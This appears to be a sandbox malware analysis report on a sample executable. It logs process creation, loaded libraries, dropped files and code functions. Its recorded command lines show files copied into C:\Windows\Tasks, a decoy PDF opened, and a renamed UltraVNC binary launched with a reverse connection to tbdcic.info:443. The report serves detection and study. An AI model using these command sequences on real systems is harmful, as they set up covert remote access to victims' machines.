Code function: 19_2_00007FF740069BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,

19_2_00007FF740069BC0

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_0040385E

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_00401DC9

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Downloads\Lom.pdf

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
Source: C:\Windows\Tasks\sync_browser.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000

Jump to behavior

Source: mSRW5AfJpC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sync_browser.exe	String found in binary or memory: -stopservice
Source: sync_browser.exe	String found in binary or memory: -install
Source: sync_browser.exe	String found in binary or memory: -startservice
Source: sync_browser.exe	String found in binary or memory: -stopservice
Source: sync_browser.exe	String found in binary or memory: -install
Source: sync_browser.exe	String found in binary or memory: -startservice

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

File read: C:\Users\user\Desktop\mSRW5AfJpC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mSRW5AfJpC.exe "C:\Users\user\Desktop\mSRW5AfJpC.exe"
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: apphelp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: sspicli.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winsta.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wldp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\Windows\Tasks\UltraVNC.ini

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

File opened: C:\Windows\SYSTEM32\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: mSRW5AfJpC.exe

Static file information: File size 1648766 > 1048576

Source:	Binary string: conhost.pdbUGP source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr
Source:	Binary string: conhost.pdb source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr

Source: Ivn55G.PqhJnU.0.dr

Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: mSRW5AfJpC.exe

Static PE information: real checksum: 0x2af97 should be: 0x19d63b

Source: Ivn55G.PqhJnU.0.dr	Static PE information: section name: .didat
Source: Ivn55G.PqhJnU.2.dr	Static PE information: section name: .didat
Source: conhost.exe.6.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00413660 push eax; ret	0_2_0041368E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400212EF push rbp; iretd	19_2_00007FF7400212F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001DC11 push rax; ret	19_2_00007FF74001DC13
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740021400 push rbp; iretd	19_2_00007FF740021401
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001DC01 push rcx; ret	19_2_00007FF74001DC02
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74001DC21 push rsp; ret	19_2_00007FF74001DC23
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740038CF9 push 8B481074h; iretd	19_2_00007FF740038CFF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74000FEF1 push rcx; ret	19_2_00007FF74000FEF2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400207F8 push rbp; iretd	19_2_00007FF7400207F9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400212EF push rbp; iretd	23_2_00007FF7400212F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001DC11 push rax; ret	23_2_00007FF74001DC13
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740021400 push rbp; iretd	23_2_00007FF740021401
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001DC01 push rcx; ret	23_2_00007FF74001DC02
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74001DC21 push rsp; ret	23_2_00007FF74001DC23
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740038CF9 push 8B481074h; iretd	23_2_00007FF740038CFF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74000FEF1 push rcx; ret	23_2_00007FF74000FEF2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400207F8 push rbp; iretd	23_2_00007FF7400207F9

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows\Tasks\sync_browser.exe

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Fgyxfc.Qnwi4I	Jump to dropped file
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to dropped file
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Ivn55G.PqhJnU	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Fgyxfc.Qnwi4I	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Ivn55G.PqhJnU	Jump to dropped file
